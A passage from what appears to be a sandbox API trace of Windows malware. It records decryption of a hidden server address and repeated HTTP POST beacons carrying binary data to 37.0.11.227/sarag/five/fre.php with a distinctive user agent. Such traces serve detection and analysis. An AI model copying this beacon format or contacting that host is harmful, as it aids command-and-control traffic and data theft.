returned 177 [0324.389] GetProcessHeap () returned 0x690000 [0324.389] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0324.389] GetProcessHeap () returned 0x690000 [0324.389] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0324.390] GetProcessHeap () returned 0x690000 [0324.390] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0324.390] GetProcessHeap () returned 0x690000 [0324.390] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0324.390] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0324.391] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0324.391] GetProcessHeap () returned 0x690000 [0324.391] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0324.391] GetProcessHeap () returned 0x690000 [0324.392] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0324.392] send (s=0xb34, buf=0x6ad508*, len=242, flags=0) returned 242 [0324.392] send (s=0xb34, buf=0x6aba40*, len=159, flags=0) returned 159 [0324.392] GetProcessHeap () returned 0x690000 [0324.392] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0324.392] recv (in: s=0xb34, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0324.491] GetProcessHeap () returned 0x690000 [0324.491] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0324.492] GetProcessHeap () returned 0x690000 [0324.492] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0324.492] GetProcessHeap () returned 0x690000 [0324.492] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0324.492] GetProcessHeap () returned 0x690000 [0324.492] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0324.492] closesocket (s=0xb34) returned 0 [0324.493] GetProcessHeap () returned 0x690000 [0324.493] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0324.493] GetProcessHeap () returned 0x690000 [0324.493] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0324.493] GetProcessHeap () returned 0x690000 [0324.493] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0324.493] GetProcessHeap () returned 0x690000 [0324.494] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0324.494] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1880) returned 0xb34 [0324.498] Sleep (dwMilliseconds=0xea60) [0324.500] GetProcessHeap () returned 0x690000 [0324.500] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0324.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.501] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0324.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.516] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0324.558] GetProcessHeap () returned 0x690000 [0324.559] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0324.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.560] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0324.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.561] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0324.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.562] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0324.562] GetProcessHeap () returned 0x690000 [0324.562] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0324.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.563] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0324.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.564] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0324.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.565] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0324.565] GetProcessHeap () returned 0x690000 [0324.565] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0324.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.566] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0324.566] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.567] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0324.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.567] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0324.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.575] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0324.575] GetProcessHeap () returned 0x690000 [0324.575] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0324.575] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0324.575] GetProcessHeap () returned 0x690000 [0324.575] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0324.576] GetProcessHeap () returned 0x690000 [0324.576] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0324.576] GetProcessHeap () returned 0x690000 [0324.576] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0324.576] GetProcessHeap () returned 0x690000 [0324.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0324.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.577] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0324.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.584] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0324.595] GetProcessHeap () returned 0x690000 [0324.595] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0324.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.598] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0324.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.599] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0324.601] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.601] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0324.601] GetProcessHeap () returned 0x690000 [0324.602] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0324.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.604] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0324.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.606] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0324.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.607] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0324.607] GetProcessHeap () returned 0x690000 [0324.607] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0324.608] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.608] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0324.608] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.609] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0324.609] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.610] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0324.610] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.610] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0324.610] GetProcessHeap () returned 0x690000 [0324.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0324.610] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0324.611] GetProcessHeap () returned 0x690000 [0324.611] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0324.611] socket (af=2, type=1, protocol=6) returned 0xb38 [0324.611] connect (s=0xb38, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0324.638] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0324.638] GetProcessHeap () returned 0x690000 [0324.638] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0324.638] GetProcessHeap () returned 0x690000 [0324.639] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0324.639] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0324.640] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0324.640] GetProcessHeap () returned 0x690000 [0324.640] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0324.640] GetProcessHeap () returned 0x690000 [0324.641] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0324.641] GetProcessHeap () returned 0x690000 [0324.641] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0324.641] GetProcessHeap () returned 0x690000 [0324.641] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0324.642] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0324.644] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0324.644] GetProcessHeap () returned 0x690000 [0324.644] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0324.644] GetProcessHeap () returned 0x690000 [0324.644] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0324.645] send (s=0xb38, buf=0x6ad508*, len=242, flags=0) returned 242 [0324.645] send (s=0xb38, buf=0x6aba40*, len=159, flags=0) returned 159 [0324.645] GetProcessHeap () returned 0x690000 [0324.645] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0324.645] recv (in: s=0xb38, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0324.720] GetProcessHeap () returned 0x690000 [0324.720] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0324.721] GetProcessHeap () returned 0x690000 [0324.721] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0324.721] GetProcessHeap () returned 0x690000 [0324.721] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0324.721] GetProcessHeap () returned 0x690000 [0324.722] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0324.722] closesocket (s=0xb38) returned 0 [0324.723] GetProcessHeap () returned 0x690000 [0324.723] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0324.723] GetProcessHeap () returned 0x690000 [0324.724] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0324.724] GetProcessHeap () returned 0x690000 [0324.724] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0324.724] GetProcessHeap () returned 0x690000 [0324.725] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0324.725] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1884) returned 0xb38 [0324.727] Sleep (dwMilliseconds=0xea60) [0324.729] GetProcessHeap () returned 0x690000 [0324.729] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0324.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.730] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0324.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.737] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0324.743] GetProcessHeap () returned 0x690000 [0324.743] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0324.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.744] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0324.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.745] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0324.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.746] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0324.746] GetProcessHeap () returned 0x690000 [0324.746] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0324.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.770] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0324.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.771] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0324.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.772] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0324.772] GetProcessHeap () returned 0x690000 [0324.773] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0324.773] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.774] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0324.775] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.775] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0324.776] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.776] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0324.777] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.786] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0324.786] GetProcessHeap () returned 0x690000 [0324.786] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0324.786] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0324.787] GetProcessHeap () returned 0x690000 [0324.787] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0324.787] GetProcessHeap () returned 0x690000 [0324.787] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0324.787] GetProcessHeap () returned 0x690000 [0324.788] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0324.788] GetProcessHeap () returned 0x690000 [0324.788] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0324.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.788] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0324.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.795] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0324.803] GetProcessHeap () returned 0x690000 [0324.803] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0324.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.804] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0324.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.805] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0324.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.806] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0324.806] GetProcessHeap () returned 0x690000 [0324.806] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0324.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.808] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0324.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.809] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0324.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.810] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0324.810] GetProcessHeap () returned 0x690000 [0324.810] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0324.811] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.812] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0324.812] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.813] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0324.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.813] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0324.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.814] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0324.814] GetProcessHeap () returned 0x690000 [0324.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0324.814] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0324.814] GetProcessHeap () returned 0x690000 [0324.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0324.814] socket (af=2, type=1, protocol=6) returned 0xb3c [0324.815] connect (s=0xb3c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0324.850] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0324.850] GetProcessHeap () returned 0x690000 [0324.850] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0324.850] GetProcessHeap () returned 0x690000 [0324.850] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0324.851] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0324.852] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0324.852] GetProcessHeap () returned 0x690000 [0324.852] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0324.852] GetProcessHeap () returned 0x690000 [0324.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0324.852] GetProcessHeap () returned 0x690000 [0324.852] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0324.852] GetProcessHeap () returned 0x690000 [0324.852] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0324.853] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0324.854] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0324.854] GetProcessHeap () returned 0x690000 [0324.854] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0324.854] GetProcessHeap () 